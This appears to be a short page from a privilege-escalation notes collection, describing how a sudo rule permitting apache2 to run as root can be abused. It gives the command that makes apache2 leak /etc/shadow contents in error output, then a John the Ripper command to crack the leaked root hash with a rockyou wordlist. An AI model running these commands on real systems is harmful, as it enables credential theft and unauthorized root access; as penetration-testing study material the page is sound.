Abusing attended functionality

This allows running apache2 as root without password. Apache config files can Include arbitrary files, so we can read root-only files through error output.

sudo /usr/sbin/apache2 -f /etc/shadow

which case error but hashed of root is leaked

then unshadow and crack hash

john shadow1 --wordlist=~/wordlist/rockyou.txt --pot=deleteme.pot

we use this option --pot=deleteme.pot to force john start crack again

Previousshell escaping NextLD_PRELOAD

Last updated 2 months ago